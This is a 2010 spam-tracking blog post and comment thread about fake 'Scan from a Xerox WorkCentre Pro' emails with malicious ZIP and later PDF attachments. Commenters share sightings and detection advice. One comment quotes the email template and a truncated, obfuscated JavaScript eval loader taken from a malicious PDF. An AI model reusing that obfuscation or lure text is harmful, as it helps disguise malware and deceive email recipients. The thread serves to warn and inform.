Scan from a Xerox WorkCentre Pro #5004716…Spam+Virus=Trouble

23

Posted by Mr Spamalicious | Posted in Computer Virus Spam - Open the Attachment or Follow a Link to Get Infected by a Trojan | Posted on 07-16-2010

Odd little virus trick. The file is XeroxN4495.zip and was sent by “Guest” so you know it’s trouble. I guess I’m supposed to be impressed that it was made using “Xerox WorkCentre Pro”.

Please open the attached document. It was scanned and sent to you using a Xerox
WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set
Device Name: XRX4723AA7ACDB49135879

For more information on Xerox products and solutions, please visit

http://www.xerox.com

VN:F [1.9.17_1161]
Rating: 4.4/5 (10 votes cast)
Scan from a Xerox WorkCentre Pro #5004716...Spam+Virus=Trouble, 4.4 out of 5 based on 10 ratings

Comments (23)

I’ve received three of these so far today, 07/16/10. It’s the first day it’s shown up in my mailbox.

I give the spyware boys some credit for changing from that tired old “UPS Delivery Notification.” That is sooo February.

I checked the IP addresses of two of them and it seems they are creating email accounts on a legit company’s email server but the email address is made up by the scammers. The display name is something innocous but the email account name is unlike any corporate name convention I’ve ever seen; “Dick” mbetx@legitcompany.com, for example.

Until the IT gang at the hijacked company notices an invalid account name or unusually high email traffic, the scammers will keep using the account.

Meanwhile, I miss the good ol’ days of IRS, Bank, and UPS notices.

VA:F [1.9.17_1161]
Rating: 4.7/5 (3 votes cast)

Too funny H.R.
Thanks for posting. Perhaps you should send the company a courtesy “you’ve been fucked by spammers” email. Doubt it will help. Months ago I notified “asasteelstructures.co.uk” that their site had been hacked and was distributing a virus and it’s still hacked.

VN:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

I have sent courtesy emails to companies in the past whose systems were compromised, but hey! I’ve got a real job and can’t be the spam/trojan horse cop for the whole internet.

After posting the above, I got my 4th one today. This one was using a legitimate standard mail account naming convention; initial.lastname. SOMEONE is sure as heck going to notice a huge leap in e-mail traffic.

This site was the first I found with the new subject line. (Same ol’ scams, only the subject lines change, eh?)

I thought I’d post to help boost the site so others who have the sense God gave a goat to check out odd emails before opening them wouldn’t have to scroll so much to confirm the scam.

Anyone not suspicious enough to check out FWD: “This is too funeee!!” emails – even if it’s forwarded by their mother – isn’t going to search anyhow.

I appreciate it when people post the latest scams to scamtracker sites like this, so I thought I’d be polite and post too, since I seem to be one of the early ones hit.

VA:F [1.9.17_1161]
Rating: 3.0/5 (2 votes cast)

I hear you. I do this site to maintain my sanity and amuse myself. I have a dozen or so emails I check so when there is a new scam I get hit hard. Then I post it here and then people find my site and it confirms their suspicions. Then smart curious folks like yourself add even more info. Works well I think. Thanks.

VN:F [1.9.17_1161]
Rating: 5.0/5 (1 vote cast)

Hey guys, great resource… no need for profanity though… I sent some managers from my work to this resource to educate themselves on this threat; and then noticed the profanity…. no big deal…just sayin.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

I hear you Cole, but this is one of the few places Mr Spamalicious gets to be as crude as he wants, so I let it rip now and then. Thanks for posting though. This blog wasn’t intended to be a resource, it just turned out that way because I break so many of the new scams first by virtue of being self employed, having about a dozen email addresses, and being tied to my computer all day. So I notice a big wave of spam right away and then post it. Hope it was helpful for the managers.

VN:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Someone sending a virii and using another email address is common and doesn’t mean they “HACKED” anyone’s email account. It is VERY EASY to send an email from any pc/computer and claim to be someone that you are not and make the headers also look like it came from them. I use the term “HACK” very seriously since I am a network engineer / security specialist and hear that term just about every day. I think it is used by people these days to simply mean posing or faking. Anyhow this virii / malware is floating around and some of our customers are getting it and some actually open it and run the .exe file that is in the .zip file. I would caution anyone to never run an .exe, .com, .bat or any file that you are not expecting or don’t no it’s origin.

Tony

VA:F [1.9.17_1161]
Rating: 5.0/5 (4 votes cast)

I’ll be bookmarking this site.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Hi
Just helping the thread
I have had 5 of these in twelve hours to one account, I agree the ups was so February.

Sweet site.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Hi, thanks for the info, I’ve received two of these this morning and guessed they were suspect so glad of the confirmation you’ve given.
In this day and age does anyone fall for this type of scam?

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Here is some additional info: http://blog.mxlab.eu/2010/07/17/oficla-trojan-in-emails-with-subject-scan-from-a-xerox-workcentre-pro/

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Hi!
I got one of those yesterday and three today…
As I am on a Mac I already set up a new rule to immediately delete everything with Xerox in the subject.
I’ve got 24 different rules so far and adding…
Sometimes you wish you were a hacker and send something ‘nice’ back to those guys!

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

It would probably make more sense to train your spam filter to recognize it. Otherwise any email you get with Xerox in the subject will get deleted. But, depending on your business that may or may not be a problem.

VN:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

7/16/10 I have had 10+ of these emailts and my antivirus reacts so drastically that I have to log off and back on again just to getr back control of the computer

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

I have had 20+ of these emails so far to our main company email address – SpamAssassin always picks them up as spam though, so they go straight to the spam folder.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Seeing this too but our antivirus on our Exchange and SMTP gateway is catching it because it looks inside compressed files (ZIP) and the policy does not allow EXE type files, even based on actual code so renaming the EXE inside a ZIP doesn’t get it through. The only thing I’ve seen get through is when they password protect a ZIP file, the scanners can’t open it. I have seen malware emails that do that and give you the password in the email.

Anybody doing ISAT (Internet Security Awareness Training) with their end-users? Seems to be a new thing now with businesses to help their employees stop testing the network system. :-)

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Got the following email today, looks like this threat is still out there. Currently using a PDF and a zero-day exploit.
The PDF is named 18-01-2011-4.pdf

“”
Hello, ganzd.

Please open the attached document.
It was scanned and sent to you using a
XER0X Work Centre Pro.

Sent by: Guest
Number of Document: 1 Attachment
File Type: PDF
WorkCentre Pro Location: machine location not set Device Name: 51592608605656

For more information on XER0X products and solutions,
please visit XER0X.C0M
“”

The following JS is contained inside of it:
<</JavaScript <</Names [() <</S /JavaScript /JS (var vrj='';var q=app['ev12'.replace\(12,'al'\)];var xfgfd = function\(\){return {e:'eva'}}\(\).e;vmth=q\(xfgfd+'1'\);cjpgh=vmth\('new Date\(2007,2,51,2,12,5\)'\);cai = 'thi'+cjpgh.getHours\(\)+;dycer;;hjr=vmth\(cai.replace\(2,'s.pro'\)\);ar = hjr.split\('q'\);var s = '';w = cjpgh.getHours\(\)*2;var rlro = 'fro'+cjpgh.getHours\(\)+'arCode';rlro=rlro.replace\(2,'mCh'\);ocdzn=String[rlro];for \(i = 0; i >] >> >> >> endobj xref trailer <>

HALP? :)

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Our agency received a flurry of these this past weekend – pretty much the same naming pattern and content as Looop has posted, and the JavaScript looks nearly identical, too. In an odd twist, some recipients’ email had the PDF file as a distinct attachment, while others rec’d the email with no attachment, yet the PDF appeared embedded in the text of the email (corrupt?). Opening the suspect message with notepad, you could see the same JavaScript and PDF content as was in the PDF itself.

It got by Antigen for Exchange, IronPort, Trend Micro, and Symantec Endpoint Protection.

Disappointing that this threat has been out for awhile, and yet when I submitted the sample to VirusTotal.com, only 4 out of 43 AV products identified it as malicious. A resubmission today upped the total to 9 out of 43, but that’s still a pretty sad showing by the AV boys.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

I got an email today titled
Re: Scan from a Xerox W. Pro #888454

the sender’s email address is:
LORICanoq42H @

and then my email account address.

It has a ziipoed attachment called:
XEROX_Document_0821_53167.zip

I have copied this but not opened it.

As the last posting here is 21/1/2011 thought I’d add this info. I’m afraid I don’t have the expertise to investigate any further

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

James,

Don’t open it, but if you want, you can submit it to VirusTotal.com and have it examined. It will likely be malicious, but I’d be curious as to how many AV products actually can identify it as such.

The submission of the attachment is pretty simple. Just save the email attachment to your Desktop, then visit the VirusTotal.com website, and click the “Browse” button on their home page. Point it to the file saved on your Desktop, and send it on its way. It’ll take a minute or so to evaluate, unless someone has already submitted the exact file previously.

Once you’ve submitted it, make sure to DELETE the attachment. May as well delete the email, too, that it came in.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Many thanks for your reply and the information and advice.
I haver submitted the file VirusTotal. I’m not sure I have understood the report, the file had already been analysed. If my interpretation is correct about half the AV’s detected it.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Xerox emails are back at it. Received 2 today at roughly the same time 11am. From what I have read here I suspect to receive more. We use the xerox workcentre so it was very odd that I would get something from a gmail account scanned in from the xerox workcentre.

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

They are back again. We received a few of these today. The virus had been stripped off by our mail server before it made it to any clients, thankfully.. Cause you know damn good and well they would have just clicked on the attachment as soon as they got the email…

VA:F [1.9.17_1161]
Rating: 0.0/5 (0 votes cast)

Write a comment

Powered by sweetCaptcha